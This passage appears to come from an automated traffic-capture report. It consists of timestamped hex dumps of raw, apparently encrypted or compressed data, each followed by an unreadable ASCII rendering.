d6 31 34 84 17 4c 10 91 62 f1 b8 63 e6 3a ee 66 45 be 0d 59 eb 24 2c 7f 1d 61 d3 e7 ae b3 a4 c2 19 11 17 8c 3e 99 18
                                                          Data Ascii: -L$0.bi<g]:0@4K[3vt5lc+dCT~JrY1+rZC_DRUQIVNg;Y{~!K2 "4~J"d6?pU%lfFr>O)=E$b]y64s*5+vSY7{tCFqP/e>6614Lbc:fEY$,a>
                                                          2021-10-13 15:10:52 UTC92INData Raw: aa f4 dc 96 b1 fe 57 6d 24 6d 82 88 8c 0f ab 02 cb 94 61 4c c3 f4 5f 3b 06 3d 2b 41 9e ef db f2 6b 0b b3 b0 33 89 dd 34 57 46 cb cb 50 1c 82 b6 79 57 0e 3b 48 5e bb 4b fa 07 03 af 0f f6 a4 ae 2c 60 7e 22 f8 76 fe f3 e0 b0 ad 69 76 2e c8 fe 25 9b 60 08 39 5b 5e d2 91 80 e4 3a 10 d9 03 34 3c 1f 9b 7e 60 0f 69 bb fe 67 7e 89 a6 6d 65 65 df 10 57 cc 5b 40 ba da 5a ff d0 b3 7c 86 33 16 6c ab ca 2f 7f 46 4b ef 12 53 9c 98 bd a2 71 80 bf c3 2a a8 d8 59 fd 3c 42 bc 1c d5 4f 07 64 ae 53 4e 10 c3 d3 f8 ba 2c c8 bd b1 f6 0c f1 cf 37 f6 92 a3 dd 21 fc 32 30 75 a6 63 6c db 0d ef eb 69 1d 35 6e ac 89 c7 76 9d 1f 4e d2 8b 85 5e e4 8c 8c 07 7b a5 d2 5d ec 30 66 d2 69 22 22 35 a8 d4 15 e1 6d 00 e7 80 ca fd df eb 0d bc aa 76 31 63 dc d7 d4 d0 0d 99 1e 18 51 d0 bf bd 8c bc
                                                          Data Ascii: Wm$maL_;=+Ak34WFPyW;H^K,`~"viv.%`9[^:4<~`ig~meeW[@Z|3l/FKSq*Y<BOdSN,7!20ucli5nvN^{]0fi""5mv1cQ
                                                          2021-10-13 15:10:52 UTC93INData Raw: 39 4e b0 5f e5 e4 89 ed 8f 7f 32 57 f8 c9 70 86 5e 23 b2 e3 eb 4f ed 9c 9c a2 46 70 da 55 6c 02 ad 04 90 bd a2 a9 43 85 2a af bc 70 95 aa 27 37 1b d2 12 ae 70 30 bd 65 70 57 24 e4 31 d1 99 2c 7b 34 59 fa 52 56 e2 60 7d 37 b4 b1 4f 33 c3 c0 32 9a 91 a8 7e f8 58 22 12 37 8f 50 cc d0 c3 84 3e 94 00 99 6b 17 72 2a ed f9 b3 84 e2 62 8c 8a 6c d8 f2 51 21 c6 05 54 b0 21 a2 4c 24 c1 59 3a 20 4d 86 68 7c 38 8f 53 1b 68 39 ba 60 b9 c2 db ff 5d 81 0a d3 e4 9f 09 ad d1 d3 9e a7 7f c7 79 2a 04 d8 2a a9 ac 26 33 23 0a 50 59 31 82 a9 31 1e 37 47 54 aa d5 c0 38 b1 58 4f d0 73 0c 10 89 24 a7 30 45 75 fe 00 8c 31 24 ec cc 58 b2 d8 b1 77 a7 8c 82 0a 1c 3a 27 e9 a0 f3 29 4e f1 65 5a c0 b4 3e 09 d4 84 1c 5b 30 79 be 82 93 0f b9 c9 57 6a 9f 96 60 59 9e 16 a2 2a 1a 72 aa ec 1d
                                                          Data Ascii: 9N_2Wp^#OFpUlC*p'7p0epW$1,{4YRV`}7O32~X"7P>kr*blQ!T!L$Y: Mh|8Sh9`]y**&3#PY117GT8XOs$0Eu1$Xw:')NeZ>[0yWj`Y*r
                                                          2021-10-13 15:10:52 UTC95INData Raw: fa 16 d0 6d 47 39 f0 3f 02 b4 c7 98 36 3c 86 39 4b 49 5d 49 c7 e0 b7 7e 41 d0 27 76 ac bb 52 15 25 4c 08 62 ea 82 1d c6 d7 36 88 b5 85 b7 e2 8f 79 28 04 94 9d a4 d6 b8 d8 de 9c 74 ce 86 55 5f 3a 2e 24 3b 4f fb ab 80 f0 61 1e f3 d6 f7 88 dd 2d 74 4c da b6 45 27 00 09 79 57 19 3c 4b 32 88 5d ec 1f 16 a8 2b f0 57 ae 2a 79 15 5e fe 60 0a e3 e7 a7 8c 56 e0 ff cc f8 38 e5 0a 86 44 51 72 e5 bf 8e eb 55 2d a8 5a 3c 2d 19 f6 a1 18 d9 7f 6d 79 23 13 8b a7 74 6c 77 d0 29 7d de 5e c8 62 a7 5b e9 f2 fc 6d 8d 33 14 66 d5 f9 3b 81 4f 2f 87 3c 44 be 6d 92 84 66 9c 93 3e 57 a8 de 75 c8 32 48 94 39 a5 16 03 0b cb 2b 5f 1f cf c2 f3 bc 2e f6 d7 86 4c 0d fb a0 98 f4 92 b8 ed 23 f8 1d 4f 67 a8 72 62 db 1e cb 43 97 ce cc 70 92 bf cd 6e bf c4 5b d8 92 ff cf e7 a0 8d 29 7b ab 4d
                                                          Data Ascii: mG9?6<9KI]I~A'vR%Lb6y(tU_:.$;Oa-tLE'yW<K2]+W*y^`V8DQrU-Z<-my#tlw)}^b[m3f;O/<Dmf>Wu2H9+_.L#OgrbCpn[){M
                                                          2021-10-13 15:10:52 UTC96INData Raw: 54 a9 8b 20 bc ff 82 ed c4 67 e8 bb 66 48 f4 dc 00 3f ae bf a9 ff e6 43 ad 6d 65 15 30 1d 57 9f 8a c6 2b ce 83 0c 53 fe 8f 3f 64 b4 72 f8 ce 8b fa f2 aa 32 58 e6 cb 07 47 5e 23 b7 8c 14 69 ed 8a f4 a2 47 5a d8 55 2b 19 9d 0d 90 3f a0 a9 41 6b 3d af ad 6e 84 ba 4d c5 1c c6 1d bb 4b a6 a8 69 6c 71 3b df 1a c7 94 29 1a 1c 49 fe 4a 2e f4 76 5d 3a a2 92 98 60 c2 c0 05 a8 be 84 7c f8 76 e1 49 36 89 49 b0 c3 c6 fb 9a 4d 00 9d 6d 11 74 16 ed f9 b3 b8 78 19 40 ba 6f dc d8 cf 20 c6 03 56 cb fd a0 4f 24 ff 71 40 c0 4b 83 44 81 52 8d 59 3d bd 59 b1 4a 8e c4 a8 dc 4c 89 03 b8 e2 b3 4e 3f d0 d5 bc 5e 70 ef 51 00 ab df 59 86 88 30 2a 5e 20 7f 24 d0 88 77 16 39 1a 7e 50 82 a7 d3 31 b4 05 ac d0 73 88 12 5c 20 a7 25 5d de ff ca 8a 17 32 ff cb 70 8a da 99 6a 79 8c 99 0f 33
                                                          Data Ascii: T gfH?Cme0W+S?dr2XG^#iGZU+?Ak=nMKilq;)IJ.v]:`|vI6IMmtx@o VO$q@KDRY=YJLN?^pQY0*^ $w9~P1s\ %]2pjy3
                                                          2021-10-13 15:10:52 UTC97INData Raw: df 10 76 ce 45 67 45 f3 39 fe b5 24 84 e4 ea 9f 25 50 12 0e 7c 56 d7 15 84 b7 13 5e 14 de dd 6c 94 9b cf e6 40 51 d3 0b 4a 83 02 5d 60 4b 24 e2 2e 16 b1 ea 28 c8 3d a0 1a 58 4a 2e f7 a9 90 b3 74 52 e5 33 7d a2 9e 22 e0 da 4d 2e 4e f2 e6 8c c0 cf a6 f8 d0 94 b2 e8 b8 6b 39 95 af b3 a7 c4 bc 07 cd 94 62 da 40 f5 73 30 28 25 57 aa 94 9c 86 eb 78 04 c9 a8 1c 90 23 26 4b 4b c8 b8 23 a8 83 09 7f 5c 05 3e 40 5d ae 5a f1 eb 01 95 2e 97 cb 2e 28 73 70 2d ef 65 00 e1 ef a8 7f 7f 72 ea cb db dd 8d d2 85 44 5d 2d ad bb 9f ef 49 65 a8 5a 3c 31 0a e8 64 72 d5 6f 68 68 b2 7f a5 ad 79 66 1b 30 01 52 d9 42 dd 08 c8 48 ec ee 24 7d aa 36 12 7b bf ce 28 84 5a 4a 16 3f 68 b6 60 bc 9a 58 6e 44 b0 7d b6 da 43 e5 21 43 87 16 a6 16 c8 64 a4 38 4b 1e fd d9 fb bc 4b 61 b8 b1 4f 1e
                                                          Data Ascii: vEgE9$%P|V^l@QJ]`K$.(=XJ.tR3}"M.Nk9b@s0(%Wx#&KK#\>@]Z..(sp-erD]-IeZ<1drohhyf0RBH$}6{(ZJ?h`XnD}C!Cd8KKaO
                                                          2021-10-13 15:10:52 UTC98INData Raw: 6a b3 b6 46 02 b9 c0 49 ef 42 ba 64 76 54 00 35 39 1e 66 2f 31 31 dd 30 d6 20 33 0a 08 9c 03 ac 65 cd 6b 48 89 d4 1f 8e 9b 87 03 5b d5 37 39 e1 fb 70 de 43 2d b3 b5 d5 04 2c a1 56 29 4f 95 13 b3 b7 b4 20 36 86 93 ba 71 6b f0 fb 18 17 0b 25 b2 1e 47 cf 7f 42 0a 2f 3d 45 5d 13 60 6f 07 b2 30 73 94 a6 d7 d8 4b 92 b4 bd ec ee dd d2 2a 69 0e d1 58 ac 81 e2 f2 b8 f7 a4 7e 1c 82 d9 56 3d 5b 9a 06 42 0b 84 70 60 48 d5 9d 7a 13 40 52 81 44 36 33 ec 3a e4 15 45 6d 69 27 23 f2 a4 3a 8f 1f d3 7f 2d 23 a9 0f 6d 55 c0 f2 89 9b 0d 44 cf 21 f6 d3 92 98 b4 9a 3f 53 d7 1c 35 fc 08 40 94 46 15 f8 2c 14 dd e1 31 36 38 92 1d 5a 41 4b bd a9 bc b7 69 47 f6 3e 62 b9 65 3c c5 26 67 07 7c a1 76 f3 3d c8 86 e7 c9 b7 b4 e8 08 6e 2e 6b 7f 9f a4 cd b9 11 c9 bd f5 c0 be f4 5f 2b 2a 38
                                                          Data Ascii: jFIBdvT59f/110 3ekH[79pC-,V)O 6qk%GB/=E]`o0sK*iX~V=[Bp`Hz@RD63:Emi'#:-#mUD!?S5@F,168ZAKiG>be<&g|v=n.k_+*8
                                                          2021-10-13 15:10:52 UTC99INData Raw: 7a cf 32 54 b0 8d a7 6b 96 1f 5b e1 bc 91 a0 e5 bf 94 1c 6f a0 4d ef 2d c2 78 e8 79 30 31 21 a2 da 02 05 92 2d c0 94 d9 cc 8b f9 08 bc a4 60 3e 97 dd ea c3 cd 7a 69 1e 34 5a d5 d3 77 9a 6a 3e 8f 0d d0 a1 c9 33 e7 a1 f3 94 b1 ba 5d 3d 29 7d 3a 4d d5 6f 2a 63 94 3d 25 0b 9f 5b 81 81 4f f7 95 ed f9 f1 62 59 4b 2a 4f 1b 17 18 00 42 d1 b3 71 65 ee df 0f 33 60 2b 6c 8c e5 0d 15 3f 2a fe 5e 3a 77 fa 1b e7 2b 25 59 4b 50 77 f8 db 1a dc fd a5 81 fb e2 25 a1 7c a7 6f 43 26 43 df 9b a9 cd 5c 2d 28 2c e0 8f af 62 c2 ff f9 be 77 24 05 ad 04 0d 8b 15 79 bc a3 e5 6a b8 00 52 92 6f 23 97 ff e1 f6 c5 60 fa cb d0 dc 21 a5 8e 39 c7 22 38 2d cb 41 80 70 5e e5 2d 0a 5a e9 e0 ce d5 c5 85 68 53 87 2a 33 65 b0 5a f1 8b 04 ef 8f 7e 5d 89 e3 c9 7a 83 55 30 b6 e3 fa 6c f2 96 20 a3
                                                          Data Ascii: z2Tk[oM-xy01!-`>zi4Zwj>3]=)}:Mo*c=%[ObYK*OBqe3`+l?*^:w+%YKPw%|oC&C\-(,bw$yjRo#`!9"8-Ap^-ZhS*3eZ~]zU0l
                                                          2021-10-13 15:10:52 UTC100INData Raw: 20 ad 10 6e a1 e4 01 8a 13 39 d4 ed 79 8c ce b6 7b f7 3b f9 25 b0 be 26 e3 17 8a 70 35 2d 6f 49 c1 3e 8f 08 1f 96 a9 e6 3f 6a bf bd 4d 0a 01 a7 8f 1a 44 80 0a 6d 5a 19 57 c2 17 70 db 33 66 c6 26 db 24 24 26 07 6b 6d 2f 67 e6 64 67 c9 2b fb 41 90 ad 2c 48 e5 35 e2 4e fb 61 ad 02 2d b3 ae cf 0a 17 08 39 e2 4e 95 1d 84 45 b1 04 5e c4 ea ba 7b 3a fb fc c6 0e 11 cf e2 24 46 16 6d 37 34 28 35 2e 15 1a 6c 65 d3 af e4 72 b9 bb d0 a6 d1 92 b2 b7 8c c2 dc d8 2e 72 02 d1 4b 83 8d 1c f4 95 fd a3 a6 61 91 c9 54 69 3f 9e 0b 42 07 e6 b2 61 64 d6 a8 7d 3b 66 49 7f 43 69 bf ed 12 7c 6e 47 37 2a f6 38 fe a2 38 bf 77 d0 53 2f 5d 3a 98 6f 53 c1 e7 8c e5 9d 58 31 2a f2 1a 94 9b cf 86 3a 55 bc 96 3b fc 0a 4e 6c 6c 04 e3 2d 3e 38 ed 30 3c 2f 89 12 4b 4c 32 da aa 90 bf 53 61 f4
                                                          Data Ascii: n9y{;%&p5-oI>?jMDmZWp3f&$$&km/gdg+A,H5Na-9NE^{:$Fm74(5.ler.rKaTi?Bad};fICi|nG7*88wS/]:oSX1*:U;Nll->80</KL2Sa
                                                          2021-10-13 15:10:52 UTC102INData Raw: 38 50 ba 16 b7 10 13 9a a5 05 5c 02 fa d5 f8 ab 39 e7 af 4f 4f 21 f3 e4 f2 ce 1b 4f 34 cd dc 19 a9 70 a6 d1 6f ca 07 2a 15 68 20 25 6b b9 b7 78 66 97 1f 5f c9 92 8f bc 1b a1 ab 1b 68 db 52 eb 3a 38 7e d2 7d a6 95 4b 0c cb 07 15 73 31 ff 97 cf d6 96 f5 1a 42 b4 49 35 6b a7 c8 df cf 05 71 37 a8 5c d7 a2 71 83 05 94 99 0f a1 ae d0 20 e5 2f 55 fd 00 a2 a3 36 18 79 3d 36 ca 6b 33 99 83 39 a9 0b e4 5f 96 99 24 36 1c ef f3 e4 c3 40 57 39 5b 1d 19 0b e5 bd fc 85 78 1c 9b ce 0e 37 62 89 f2 26 de 94 17 2e 25 f7 4d ab d8 d6 0e ea 36 49 44 4c 50 62 91 4d 0c 22 f6 80 41 41 4e 20 bf 70 b0 6d cd 80 f0 ea f9 aa e1 42 2d 32 38 42 8e af 6c b2 66 e8 b8 7d 22 d9 a5 fe 00 b9 0f 02 a9 b3 e0 71 bb e2 40 b8 75 30 96 e2 80 18 c5 4c e5 47 1c 6a f7 cb 0f 1f a9 26 57 fe e2 dd 84 6f
                                                          Data Ascii: 8P\9OO!O4po*h %kxf_hR:8~}Ks1BI5kq7\q /U6y=6k39_$6@W9[x7b&.%M6IDLPbM"AAN pmB-28Blf}"q@u0LGj&Wo
                                                          2021-10-13 15:10:52 UTC103INData Raw: 62 7b f9 4b b4 72 71 d1 61 6d 05 d9 2a a5 95 3b 33 20 22 79 5d 2c 76 76 3e 2c 1d 0b 5a ab df d7 2e 9f 50 d2 d2 73 86 2e 44 4f 09 36 6d d0 e1 13 8e 17 23 fb d4 66 74 d9 9d 6c 71 8e e8 02 24 bc 22 86 3d e5 2b 3f 26 7a 4d d7 3e 89 0f 0a 8c d7 b6 3e 46 a2 b8 27 01 b8 c9 51 06 6b 0b 62 5d 85 0b 22 56 b9 70 d1 3a 02 cd 34 df 20 2b 11 19 9c 03 ac 68 e4 15 7e e2 2b e4 1e 33 af 03 42 ef 2c 2a 4a fb 61 da 8c 35 4d a5 ef 76 16 7b 58 28 4f 91 04 a4 c4 9e 0c 31 bf e7 b3 67 4b 13 f7 18 1f 89 d2 a4 12 b2 c8 67 3f 84 27 25 61 bd 1a 6c 6f 93 a1 d7 52 47 ab d0 a6 4f 9b ae 97 6e e1 dc d2 b2 7b 19 f1 af b3 88 1c 6f 9d e1 83 85 61 91 d8 ca 30 59 b0 f5 42 03 93 12 68 7a f7 7a 76 13 48 d7 76 5a 13 19 10 12 76 14 d9 6e 5a 35 19 01 a4 32 97 7d db 4c 2e 70 ed 0e 6d 53 57 e2 93 84
                                                          Data Ascii: b{Krqam*;3 "y],vv>,Z.Ps.DO6m#ftlq$"=+?&zM>>F'Qkb]"Vp:4 +h~+3B,*Ja5Mv{X(O1gKg?'%aloRGOn{oa0YBhzzvHvZvnZ52}L.pmSW
                                                          2021-10-13 15:10:52 UTC104INData Raw: 6c 78 c8 09 52 cc 56 d1 1d 36 58 c5 fe f1 5f 99 24 16 60 ba df 31 99 bb 41 c4 30 64 b4 0b b9 a2 fa ba bb 4f 56 a2 c1 4b dd 23 52 b4 09 b5 e8 04 48 a9 38 59 04 ee 90 3d 47 c0 07 a7 a5 5d 05 f1 de ff e9 b3 4c ca 1e e6 08 e2 7a a7 63 68 c3 68 54 17 68 3b 2c 5a ac 87 dc 74 9f 08 a1 d9 b8 93 b8 f6 a8 87 1e 62 bb a2 eb 16 37 7d ab f3 2a 22 2e b1 cf 1b 0c 64 2c fd 99 d0 dc 6e eb 21 ad b6 35 59 70 dd c6 da d1 41 cf 1f 34 5e c8 b4 74 93 6a 2b 91 13 55 b0 e4 23 e0 7f 3f e2 1e ba 59 21 74 9a c1 b2 3b 77 20 95 95 00 3d 16 f9 ab 81 ad 44 9c 73 6a fb fb d0 6a 29 39 4a 1b 19 03 08 b4 d0 8e 72 78 83 31 0f 1f 75 04 15 eb ef 09 15 2a 31 a1 e8 39 89 29 11 f7 3a 56 57 5b 58 6c 88 ac 19 f0 fb af 0b 55 48 37 bf 70 b0 75 63 24 4e c2 74 a0 fe 54 c5 2b 7b e0 8c d4 6d ac 73 ff 93
                                                          Data Ascii: lxRV6X_$`1A0dOVK#RH8Y=G]LzchhTh;,Ztb7}*".d,n!5YpA4^tj+U#?Y!t;w =Dsjj)9Jrx1u*19):VW[XlUH7puc$NtT+{ms
                                                          2021-10-13 15:10:52 UTC105INData Raw: 13 51 6d dc 9d d0 2b d5 0b 56 da f5 bd 57 de d6 ef 4d c8 5c 81 52 c4 53 8d 53 0e aa 62 97 48 9f ca c4 e2 b0 88 25 db e9 b4 6e b2 dd 03 9e 4d 7a c7 75 2a 00 db 2a a5 f7 11 21 24 26 77 41 22 80 77 03 33 02 8e 55 86 d5 d4 26 f2 e9 4f d0 73 92 2b 54 20 b6 3e 71 24 fe 2c 87 14 3a e7 1d 58 04 da b1 77 73 91 80 05 25 ad 2e f1 5e e4 07 39 2e eb ed de 05 44 1f 0e 93 df 5b 37 6a a4 b2 43 06 47 c8 79 1e 40 9e 7f 57 59 35 b6 3b 17 7a dc 2f 17 cc 2f db 31 32 0a 14 9c 03 ac 6e f7 68 67 d0 4f ff 67 80 a5 03 59 ed 2a 20 b0 fa 5c c7 96 2e bb bb df de 3c 3f 57 29 45 bd b0 aa 49 bf 71 13 bf ea be 6e 71 ff ff 18 0e 1d c4 ab cc 4c e4 7e 3a 1b 26 22 55 94 32 53 6e 0f a2 e6 d9 ba ab da db f0 93 b4 b3 8e f8 cf da 2e 63 0a ca ae b2 a4 17 f0 9c d5 2d 78 61 9b d3 4a 2a 4c 90 1b 4a
                                                          Data Ascii: Qm+VWM\RSSbH%nMzu**!$&wA"w3U&Os+T >q$,:Xws%.^9.D[7jCGy@WY5;z//12nhgOgY* \.<?W)EIqnqL~:&"U2Sn.c-xaJ*LJ
                                                          2021-10-13 15:10:52 UTC107INData Raw: 6a 07 9f 45 b4 81 74 52 f5 a2 de 73 c1 62 82 2e 75 59 c5 b3 42 21 3a 1a aa 58 4d 32 14 e1 73 68 c9 14 7a 1c df 7c 89 ad 58 67 09 69 03 52 d7 4d c6 0a a7 eb eb f8 d0 6f 82 32 6a da b8 ce 33 8c 54 45 f9 38 c8 4e 4b b9 a3 5f a6 ba 4f 5d aa a3 56 d4 23 47 d3 b6 a4 16 0f e8 37 29 5f 14 ff fb 67 bb 3f f2 94 b5 58 07 2f bc f5 e7 9a cf da 33 f6 0e 9b 65 a2 74 06 10 b0 e2 c3 e5 1a 33 78 be f2 cc 64 97 1b 5d a3 9a 91 a0 e1 a9 91 60 f9 a2 5c e0 1c 3e 02 ca 7b 28 26 26 d9 db 06 1f 68 3a fd 95 78 a8 cb ea 0d b6 93 67 59 67 dd c6 da c6 17 08 8c 36 5e dd 8e 70 91 b4 18 9b 74 a5 b0 c8 37 8c a6 46 fb 15 ac 37 0a 5c 90 c0 b2 1a 66 1b aa 95 11 3f 21 dc 55 80 8b 95 98 0a c5 ff d1 9b 4f 51 39 4a 1b 06 1d 09 bc d0 9f cc 66 95 cf c6 32 64 07 49 90 f6 08 0f 2e 2f e0 46 f4 74 d6
                                                          Data Ascii: jEtRsb.uYB!:XM2shz|XgiRMo2j3TE8NK_O]V#G7)_g?X/3et3xd]`\>{(&&h:xgYg6^pt7F7\f?!UOQ9Jf2dI./Ft
                                                          2021-10-13 15:10:52 UTC108INData Raw: 54 fa 67 7b 1a 43 b6 67 99 d4 4d 33 a3 96 ab 6a ec 64 ba bb 37 89 49 de e9 2e 82 45 4b 17 14 68 15 09 f7 fe fd a6 96 6e 0e df a5 6c dc 9c 6d 31 c2 17 42 dd ea 8a e1 20 d7 c9 46 d4 65 6a 68 13 55 9b de 16 b6 71 9e 5c 9a d6 cc dd e2 89 09 c8 ca 9c 3c aa c5 fd 5b 76 7b c1 69 8f ac d9 2a ae 9e 24 34 0c 8a 68 59 3b 9c 5f fc 3f 1f 76 42 27 d8 d3 31 b3 6c 5a c4 5b 24 38 5c 2a 8f 27 6d da f5 0c 82 03 1a 10 cf 70 8c cf 3c 7a 79 8c 92 1e 21 ad 22 ff 88 15 2f 35 2b c7 4b c0 2e 9d 0a 26 3b c6 48 35 42 0e ba 5c 05 95 cb 7e 29 44 82 48 b0 8b 1d 3e 2f 9a 77 d1 30 1c cb 33 cf 08 92 15 01 68 16 a8 96 e2 6e 76 f5 a6 e7 71 93 ac 17 5c f1 1d 91 4e fb 7a f6 29 2d b3 ae eb b3 14 00 5c 13 21 6a e4 57 4e a1 24 c3 ba ea bc 67 e6 eb f7 18 1e 01 cf a7 1a e5 c8 67 35 30 74 3d 41 48
                                                          Data Ascii: Tg{CgM3jd7I.EKhnlm1B FejhUq\<[v{i*$4hY;_?vB'1lZ[$8\*'mp<zy!"/5+K.&;H5B\~)DH>/w03hnvq\Nz)-\!jWN$gg50t=AH
                                                          2021-10-13 15:10:52 UTC109INData Raw: 6f 98 82 f6 04 b8 cb b9 13 e6 51 26 67 4a e3 e1 52 1c 84 66 79 56 1f 27 1a 71 9e 59 fd 11 11 b4 48 15 a5 ae 20 5b 81 37 fc 66 6f 49 e8 b6 8b 11 d2 fc cc f4 0b ad 64 84 4e 50 80 f9 a8 8e 8a f1 1a aa 50 0c 45 ea 1e 88 a9 c3 6f 7c 06 77 7e 89 a6 52 6c 77 ca 74 69 dd 5e cf 62 9f 59 e9 f2 06 54 73 31 05 6e 90 c9 13 81 45 40 a9 5a 44 b4 49 b9 a2 77 bc bb 4f 57 a3 d8 58 d5 1b 43 bc 16 aa 16 05 64 a4 29 5f 15 eb d3 f8 ba 7b f8 b8 b1 64 0c f1 cf 99 f7 92 b2 dd 32 f6 0a 99 74 a6 63 6e ca 07 f5 9e 69 31 33 60 bf 8f dc c6 96 1f 5f d4 94 90 a0 e5 a0 87 0f 68 a0 5c ea 83 3d 79 c4 e0 28 22 24 f1 c9 07 1f 7a 2c ec 91 cf c7 90 ea 16 8c bc 65 d7 6b dc c6 32 cf 01 76 01 b9 75 d7 a8 66 88 63 49 2c 0f ab bb db 35 f2 29 50 d3 99 b8 5d 31 23 e3 38 4d c4 6b 20 93 84 1f 23 18 ed
                                                          Data Ascii: oQ&gJRfyV'qYH [7foIdNPPEo|w~Rlwti^bYTs1nE@ZDIwOWXCd)_{d2tcni13`_h\=y("$z,ek2vufcI,5)P]1#8Mk #
                                                          2021-10-13 15:10:52 UTC111INData Raw: da 5f 40 d4 43 01 81 39 8c ae 52 45 45 f8 ad 64 8c 70 37 2e c2 d3 3c 90 54 34 a9 63 75 58 18 f1 31 c5 92 25 41 0d 4b fe 4a 8a f0 66 45 32 a6 b3 7b 9f c2 c2 34 bb 96 95 29 f8 7c 92 13 37 89 43 ca c1 c5 e1 22 4d 15 83 6f 15 08 ed dd fa b7 3e 78 19 53 64 6c dc 8c e7 27 c3 03 50 b8 43 a0 4c 2a db cb 2e 7f 4f 86 66 1e 2d 15 53 11 bc 7a 96 27 e6 c2 db ff 5d 8f 22 9a fd b1 09 c4 d1 d5 bc 06 3d c7 7f 03 b8 dd 2d d1 12 30 20 2e 4d 75 58 31 82 5b 3e 2a 1b 58 5c af df d5 5e 71 7a 4e da 5b 37 38 5c 2a 8b 24 7c de d7 09 8f 17 34 90 08 72 8a d2 de 68 79 8c 99 06 34 b8 49 2d a2 e5 21 32 05 83 59 c4 3c f7 86 0e 93 cc 27 42 6a b5 b0 57 1e bf a6 3e 11 43 9c 4d c2 51 11 29 3f 3b 77 c0 36 72 88 27 db 2a e6 12 0b bc 17 a5 4f d1 6e 70 e9 38 e5 59 99 a8 03 4e ef 1d 01 4e fb 7a
                                                          Data Ascii: _@C9REEdp7.<T4cuX1%AKJfE2{4)|7C"Mo>xSdl'PCL*.Of-Sz']"=-0 .MuX1[>*X\^qzN[78\*$|4rhy4I-!2Y<'BjW>CMQ)?;w6r'*Onp8YNNz
                                                          2021-10-13 15:10:52 UTC112INData Raw: a2 9f 52 be 24 4c 08 98 f9 8f 63 0f cd ac ed cc 9d a1 87 5d 6f 2e 6d 86 85 a5 dc a5 2a 94 87 67 c6 96 da 5d 3a 28 4d 57 41 94 96 89 f2 6d 6e 04 bb 19 83 c7 3d 71 2f 3f bb 50 1a aa 13 78 57 15 05 1c 5f bf 59 c4 3b 02 b9 21 f0 d9 ae 2a 79 77 31 fa 0f cd f2 ea bc 9e 72 44 ea a3 0a 22 8a 62 92 6c 42 5f d3 b3 93 e2 12 0b af 5a 30 53 08 e0 77 7d ec c9 6c 73 4c 56 9b a2 7e 66 6b d2 29 41 d8 5e c8 62 d5 58 e9 f2 f6 70 8f 1d 11 6d ba c8 11 a5 45 40 e2 33 46 b2 24 74 a0 77 9b a4 77 4d be b7 ac d4 23 45 94 0c a7 16 0f 4c fd 2b 5f 13 c1 fd fa ba 39 97 c5 b1 4e 07 d9 f7 f5 f6 98 a1 cc 25 e5 02 a1 25 a7 63 6c db 00 f7 6e 5f 30 33 7c d0 41 de 65 9d c5 47 00 83 4a b7 33 2d 92 0f 6a a1 4f e3 2c 2d 7e c6 01 1f 23 24 a6 a4 c9 1d 6c 26 36 89 17 d0 4a f9 1c af bf 4e 1a 78 d5
                                                          Data Ascii: R$Lc]o.m*g]:(MWAmn=q/?PxW_Y;!*yw1rD"blB_Z0Sw}lsLV~fk)A^bXpmE@3F$twwM#EL+_9N%%cln_03|AeGJ3-jO,-~#$l&6JNx
                                                          2021-10-13 15:10:52 UTC113INData Raw: b9 19 4f f3 bf d7 20 c4 b8 75 4e 90 af 3e 48 b9 56 77 53 9a e9 90 62 21 53 e2 d8 77 83 4a dd b2 cf e2 51 79 80 de a2 4b 7f c9 5e 6d 08 96 12 b6 c1 a1 85 65 4a 3d 79 aa 0b 7a ad 30 22 1b a9 e5 b9 63 32 c6 ba 64 5d 3a e0 ee aa 40 2d 69 3f 24 04 41 54 f6 b6 62 2d 81 a1 6c 9f d3 cb 2b 9a 68 ab 52 e8 61 9a 10 3e 9e 95 5b ae 3e 87 45 4b 1f a3 7c 1e 09 e7 e6 e6 f6 6c 79 35 71 8d 03 20 9c cf 26 c1 6c aa ca fd a4 23 f3 d5 c3 4b d7 97 e9 b8 11 53 87 5b 7e 49 70 9f 4e 91 80 c8 fe 4e 98 02 db 12 b6 4a a1 c7 d6 38 c5 6c 1d 6c 0b a6 c3 39 a4 8a 21 2b 3b 34 96 58 1d 99 74 1b 23 c9 78 42 bb db fb 2a b3 78 44 cf 64 9f 33 5c 31 ac 29 71 24 fe 2c 86 06 34 e7 a4 89 8b d8 b7 62 64 9f 98 0d 34 b7 39 f0 5e e4 07 3c 15 a1 59 c4 3a 96 04 1d 98 c6 59 34 75 f7 44 5d 23 9f c0 42 c7
                                                          Data Ascii: O uN>HVwSb!SwJQyK^meJ=yz0"c2d]:@-i?$ATb-l+hRa>[>EK|ly5q &l#KS[~IpNNJ8ll9!+;4Xt#xB*xDd3\1)q$,4bd49^<Y:Y4uD]#B
                                                          2021-10-13 15:10:52 UTC114INData Raw: 30 ea 38 92 6a 70 41 5c 37 32 71 21 5e cf 6a 22 96 8a 36 cb 08 c8 5c b8 36 4a 98 1c f0 d1 e8 d1 53 40 32 55 32 f8 1c 37 b7 a3 9f 78 67 93 dc 09 2c 4e 14 4e 90 e7 03 09 d0 2e cd 5d c7 7f 47 1d ea 34 4d 5c 4a 41 78 88 76 e6 dd db bd 58 4a 2d f8 b6 66 a5 6e 6b 2c 47 c2 6f b7 c4 5b 30 2a 46 e7 91 85 98 ac 5f f7 af 7a 29 b0 47 01 01 93 19 57 af b9 e0 64 bc e6 ad bf 59 28 e3 fd 98 e6 c2 6b e7 56 6c 64 e7 c0 14 1a 57 a6 7b dc cd 2e 7a 6e 4e f0 2f 65 b7 ed ff c2 44 17 ab 7e 5b 92 8b 50 b0 b2 5e f3 ec e6 12 8e 74 34 47 c4 da 77 9c 4f 28 a4 1d ea 45 ee 98 cd a9 54 7b d1 4a 56 e7 9c 21 83 3c a9 be 95 d2 3d 75 ba b2 0b 87 30 24 1d ca 06 84 70 3f a9 78 6d 42 1d 09 35 e9 87 2c 60 22 9d 6f 57 8e e7 b6 e2 19 a6 b2 66 93 dd ee 27 a8 96 bb 75 e7 4d 6c 12 1b 84 40 44 76 cc
                                                          Data Ascii: 08jpA\72q!^j"6\6JS@2U27xg,NN.]G4M\JAxvXJ-fnk,Go[0*F_z)GWdY(kVldW{.znN/eD~[P^t4GwO(ET{JV!<=u0$p?xmB5,`"oWf'uMl@Dv
